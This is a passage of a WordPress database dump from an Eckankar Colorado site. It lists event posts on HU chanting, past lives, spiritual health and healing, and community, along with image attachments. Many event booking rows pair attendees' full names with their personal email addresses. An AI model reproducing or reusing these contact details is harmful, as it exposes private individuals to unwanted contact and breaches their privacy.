21:15:51','2022-06-22 03:15:51','',266813,'https://eckankar-colorado.org/wp-content/uploads/2022/06/sound-of-soul-2.jpg',0,'attachment','image/jpeg',0),(266820,2,'2022-06-21 21:42:33','2022-06-22 03:42:33','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 18pt;\">Do you wonder if you have lived before?<br>\r\n</span><span style=\"font-size: 18pt;\">Are you curious about why your life is the way it is?<br>\r\n</span><span style=\"font-size: 18pt;\">Would you like to break free of old karmic patterns?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Knowing past lives can help you today. Your job, your family, your virtues and shortcomings all have roots in distant landscapes. Even if the concept of past lives seems foreign, the threads of these experiences are closer than you might think. Taking the time to explore them can bring untold freedom.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This ECK Light and Sound Service will help you unlock memories and lessons that can help you sort through problems and move ahead with confidence. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>\'What Past Lives Teach Us Today\'','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinewhat-past-lives-teach-us-today','','','2022-06-21 21:55:39','2022-06-22 03:55:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266820',0,'mec-events','',0),(266821,2,'2022-06-21 21:41:15','2022-06-22 03:41:15','','machu-pichu-3','','inherit','closed','closed','','machu-pichu-3','','','2022-06-21 21:41:15','2022-06-22 03:41:15','',266820,'https://eckankar-colorado.org/wp-content/uploads/2022/06/machu-pichu-3.jpg',0,'attachment','image/jpeg',0),(266822,1000021,'2022-07-10 10:30:00','2022-07-10 16:30:00','','ELSS Test - choll.03@comcast.net','','publish','closed','closed','','elss-test-choll-03comcast-net','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266822',0,'mec-books','',0),(266824,1000031,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Laurah Brock young - laurahbrockyoung@gmail.com','','publish','closed','closed','','laurah-brock-young-laurahbrockyounggmail-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266824',0,'mec-books','',0),(266826,2,'2022-06-22 15:37:17','2022-06-22 21:37:17','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound, and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this IN-PERSON event in Pagosa Springs, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and a discussion group, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.<br>\r\nFind out more about HU at <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong><em>We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup -Experience HU, The Sound of Soul<br>In Person - Pagosa Springs','','publish','closed','closed','','experience-hu-the-sound-of-soulin-person-pagosa-springs','','','2022-06-22 15:47:25','2022-06-22 21:47:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266826',0,'mec-events','',0),(266827,2,'2023-08-31 12:45:23','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Tagline Goes Here<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here','','draft','closed','closed','','','','','2023-08-31 12:45:23','2023-08-31 18:45:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266827',0,'mec-events','',0),(266829,15,'2022-06-24 15:49:11','2022-06-24 21:49:11','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-- See your state of health from a higher perspective</span><br>\r\n<span style=\"font-size: 14pt;\">-- Learn to tap into the creative healing force</span><br>\r\n<span style=\"font-size: 14pt;\">-- Learn how healing miracles occur</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the first of 3 discussions that dig deeper into the topic each time. \'<em>Spiritual Wisdom on Health and Healing</em>\' will help you see yourself and your state of health from a higher perspective than you\'ve likely ever imagined possible.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for one or all lively discussions about the spiritual side of \'Health and Healing\'.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span><br>\r\n<span style=\"font-size: 14pt;\">***</span><br>\r\n<span style=\"font-size: 14pt;\">Check out the booklet:&nbsp; <em><a class=\"link\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Health_and_Healing-74-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Wisdom on Health and Healing</a></em> by Harold Klemp</span><span style=\"font-size: 14pt;\"></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Take a look at this video: Harold Klemp shares wisdom on <a href=\"https://www.youtube.com/watch?v=RmxUyu7u2uo\" target=\"_blank\" rel=\"noopener\">Health and Healing</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by ECKANKAR, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/286696102/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Health and Healing Spiritual Discussion\'','','publish','closed','closed','','meetup-onlinehealth-and-healing-spiritual-discussion','','','2022-06-24 15:49:11','2022-06-24 21:49:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266829',0,'mec-events','',0),(266830,15,'2022-06-24 15:46:05','2022-06-24 21:46:05','','GoldenHand','','inherit','closed','closed','','goldenhand','','','2022-06-24 15:46:05','2022-06-24 21:46:05','',266829,'https://eckankar-colorado.org/wp-content/uploads/2022/06/GoldenHand.webp',0,'attachment','image/webp',0),(266831,15,'2022-06-24 15:53:16','2022-06-24 21:53:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-- See your state of health from a higher perspective</span><br>\r\n<span style=\"font-size: 14pt;\">-- Learn to tap into the creative healing force</span><br>\r\n<span style=\"font-size: 14pt;\">-- Learn how healing miracles occur</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the second of 3 discussions that dig deeper into the topic each time. \'<em>Spiritual Wisdom on Health and Healing</em>\' will help you see yourself and your state of health from a higher perspective than you\'ve likely ever imagined possible.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for one or all lively discussions about the spiritual side of \'Health and Healing\'.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span><br>\r\n<span style=\"font-size: 14pt;\">***</span><br>\r\n<span style=\"font-size: 14pt;\">Check out the booklet:&nbsp; <em><a class=\"link\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Health_and_Healing-74-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Wisdom on Health and Healing</a></em> by Harold Klemp</span><span style=\"font-size: 14pt;\"></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Take a look at this video: Harold Klemp shares wisdom on <a href=\"https://www.youtube.com/watch?v=RmxUyu7u2uo\" target=\"_blank\" rel=\"noopener\">Health and Healing</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by ECKANKAR, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"http://meetup.com/segofdenver/events/286696180/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Health and Healing Spiritual Discussion\'','','publish','closed','closed','','meetup-onlinehealth-and-healing-spiritual-discussion-2','','','2022-06-24 15:53:16','2022-06-24 21:53:16','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266831',0,'mec-events','',0),(266832,15,'2022-06-24 15:56:15','2022-06-24 21:56:15','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-- See your state of health from a higher perspective</span><br>\r\n<span style=\"font-size: 14pt;\">-- Learn to tap into the creative healing force</span><br>\r\n<span style=\"font-size: 14pt;\">-- Learn how healing miracles occur</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the third of 3 discussions that dig deeper into the topic each time. \'<em>Spiritual Wisdom on Health and Healing</em>\' will help you see yourself and your state of health from a higher perspective than you\'ve likely ever imagined possible.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for one or all lively discussions about the spiritual side of \'Health and Healing\'.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span><br>\r\n<span style=\"font-size: 14pt;\">***</span><br>\r\n<span style=\"font-size: 14pt;\">Check out the booklet:&nbsp; <em><a class=\"link\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Health_and_Healing-74-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Wisdom on Health and Healing</a></em> by Harold Klemp</span><span style=\"font-size: 14pt;\"></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Take a look at this video: Harold Klemp shares wisdom on <a href=\"https://www.youtube.com/watch?v=RmxUyu7u2uo\" target=\"_blank\" rel=\"noopener\">Health and Healing</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by ECKANKAR, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/286696185/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Health and Healing Spiritual Discussion\'','','publish','closed','closed','','meetup-onlinehealth-and-healing-spiritual-discussion-3','','','2022-06-24 15:56:15','2022-06-24 21:56:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266832',0,'mec-events','',0),(266833,0,'2022-06-26 20:11:18','2022-06-27 02:11:18','','','','publish','closed','closed','','266833','','','2022-06-26 20:11:18','2022-06-27 02:11:18','',0,'https://eckankar-colorado.org/nf_sub/266833/',0,'nf_sub','',0),(266834,1000032,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Sarah Cole  - stoneycole78@gmail.com','','publish','closed','closed','','sarah-cole-stoneycole78gmail-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266834',0,'mec-books','',0),(266835,1000022,'2022-07-03 10:30:00','2022-07-03 16:30:00','','Jorge Santaigo - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santaigo-jiuuumalukgmail-com','','','2022-07-03 10:30:00','2022-07-03 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266835',0,'mec-books','',0),(266836,1000022,'2022-07-10 10:30:00','2022-07-10 16:30:00','','jorge santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-2','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266836',0,'mec-books','',0),(266838,2,'2022-07-02 13:42:44','2022-07-02 19:42:44','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Listen or share your spiritual experiences, insights, and questions in a relaxed atmosphere.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in. </span><span style=\"font-size: 14pt;\"><br>\r\n</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health</em>. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'What Past Lives Teach Us Today\'','','publish','closed','closed','','roundtable-discussion-in-personwhat-past-lives-teach-us-today','','','2022-07-02 13:53:25','2022-07-02 19:53:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266838',0,'mec-events','',0),(266839,2,'2022-07-02 13:39:40','2022-07-02 19:39:40','','waterfalls-2','','inherit','closed','closed','','waterfalls-2','','','2022-07-02 13:39:40','2022-07-02 19:39:40','',266838,'https://eckankar-colorado.org/wp-content/uploads/2022/07/waterfalls-2.jpg',0,'attachment','image/jpeg',0),(266841,2,'2022-07-02 14:04:41','2022-07-02 20:04:41','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the June 2022 edition of \'<em>The Mystic </em><em>World</em>.\'</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Please find the Zoom login information in the July 2022 Newsletter and have your copy of this issue on hand at the meeting.&nbsp;&nbsp;</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion -- June 2022 Edition','','publish','closed','closed','','mystic-world-discussion-june-2022-edition','','','2022-07-02 14:07:33','2022-07-02 20:07:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266841',0,'mec-events','',0),(266844,15,'2022-07-05 21:24:43','2022-07-06 03:24:43','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Have you wondered what the greatest creative force is that you can use for healing?</span></li>\r\n</ul>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Or how miracles for healing occur?</span></li>\r\n</ul>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Or perhaps you’ve wondered how you can bring healing and restoration into your life.</span></li>\r\n</ul>\r\n<blockquote class=\"\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All the help that comes to us is from the Holy Spirit, whether it comes in a dream or through the help of a friend or a doctor. The trick is the discrimination you need: to tell what’s good for you and what’s not good for you.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This comes by listening to your heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">—Harold Klemp,&nbsp;<em><i>ECK Wisdom on Health and Healing</i></em>, p.3</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come and join other spiritual experiencers as we explore health from a higher perspective–perhaps higher than anything you’ve ever imagined possible. Discover how true healing goes beyond healing just the physical body.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will share a spiritual exercise and other resources that you can use to gain deeper insight into your life and health so you can begin your spiritual healing journey today–a journey that can help you survive and thrive in these challenging times.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Can’t wait for the event? Check out the Kindle version of&nbsp;<a href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Health_and_Healing-74-0.html\" target=\"_blank\" rel=\"noopener\"><em><i>ECK Wisdom on Health and Healing</i></em></a> by Harold Klemp. Then come to the event and join in the discussion by sharing your insights and questions.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Here are a couple of additional resources to check out before the event:</span></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li><span style=\"font-size: 14pt;\">Read the <a href=\"https://eckankarblog.org/\" target=\"_blank\" rel=\"noopener\">Eckankar Blog</a></span></li>\r\n	<li><span style=\"font-size: 14pt;\">Take a look at this video: <a href=\"https://www.youtube.com/watch?v=RmxUyu7u2uo\" target=\"_blank\" rel=\"noopener\">Harold Klemp shares wisdom on \'Health and Healing\'</a></span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Event Presented by ECKANKAR, the Path of Spiritual Freedom as a community service for people of all faiths and beliefs. &nbsp;We look forward to seeing you!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div>**<em>We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286994262/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>Spiritual Experiences of Health and Healing','','publish','closed','closed','','meetup-in-personspiritual-experiences-of-health-and-healing','','','2022-07-05 21:24:43','2022-07-06 03:24:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266844',0,'mec-events','',0),(266845,15,'2022-07-04 09:52:33','2022-07-04 15:52:33','','HealthHealing','','inherit','closed','closed','','healthhealing','','','2022-07-04 09:52:33','2022-07-04 15:52:33','',266844,'https://eckankar-colorado.org/wp-content/uploads/2022/07/HealthHealing.png',0,'attachment','image/png',0),(266846,1000024,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Roger Morandi - rmorandi@comcast.net','','publish','closed','closed','','roger-morandi-rmorandicomcast-net-2','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266846',0,'mec-books','',0),(266847,1000015,'2022-07-19 19:00:00','2022-07-20 01:00:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-4','','','2022-07-19 19:00:00','2022-07-20 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266847',0,'mec-books','',0),(266848,1000015,'2022-07-17 11:45:00','2022-07-17 17:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-5','','','2022-07-17 11:45:00','2022-07-17 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266848',0,'mec-books','',0),(266849,15,'2022-07-07 17:07:31','2022-07-07 23:07:31','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">What does spiritual community mean to you?</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to share your spiritual journey with other like-hearted people?</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Is retaining your individuality important to you on a spiritual path?</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you want to explore how to be completely you yet connected to others?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss the many benefits of spiritual community as we each walk our path back home to God and explore ways to maintain our individuality while connecting with others. Our goal is that each person will have a new and expanded vision of what a spiritual community can be.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says, “<em>…a true religion is one that does good in the world and tries to find ways to help people be themselves. It does not try to shape people to be what we think they should be. The sign of a good religion is that it helps the people grow to become more godlike, to be capable of more love and mercy—for themselves as well as for others.</em>”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/287037308/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'12 Gifts of Spiritual Living: Spiritual Community\'','','publish','closed','closed','','meetup-online12-gifts-of-spiritual-living-spiritual-community','','','2022-07-07 17:07:31','2022-07-07 23:07:31','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266849',0,'mec-events','',0),(266850,15,'2022-07-07 17:04:16','2022-07-07 23:04:16','','EckCommunity','','inherit','closed','closed','','eckcommunity','','','2022-07-07 17:04:16','2022-07-07 23:04:16','',266849,'https://eckankar-colorado.org/wp-content/uploads/2022/07/EckCommunity.webp',0,'attachment','image/webp',0),(266851,1000023,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Bonnie Greenstreet  - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-4','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266851',0,'mec-books','',0),(266852,1000033,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Hal H - harusan@aol.com','','publish','closed','closed','','hal-h-harusanaol-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266852',0,'mec-books','',0),(266853,1000033,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Hal Garnett - harusan@aol.com','','publish','closed','closed','','hal-garnett-harusanaol-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266853',0,'mec-books','',0),(266854,1000006,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Dave Ogletree - dogle007@yahoo.com','','publish','closed','closed','','dave-ogletree-dogle007yahoo-com-2','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266854',0,'mec-books','',0),(266855,1000006,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Dave Ogletree - dogle007@yahoo.com','','publish','closed','closed','','dave-ogletree-dogle007yahoo-com-3','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266855',0,'mec-books','',0),(266856,1000022,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-3','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266856',0,'mec-books','',0),(266857,1000014,'2022-07-10 10:30:00','2022-07-10 16:30:00','','kery colvin - keanchico@yahoo.com','','publish','closed','closed','','kery-colvin-keanchicoyahoo-com-2','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266857',0,'mec-books','',0),(266858,1000021,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Test Message - choll.03@comcast.net','','publish','closed','closed','','test-message-choll-03comcast-net','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266858',0,'mec-books','',0),(266859,1000006,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Dave Ogletree - dogle007@yahoo.com','','publish','closed','closed','','dave-ogletree-dogle007yahoo-com-4','','','2022-07-10 10:30:00','2022-07-10 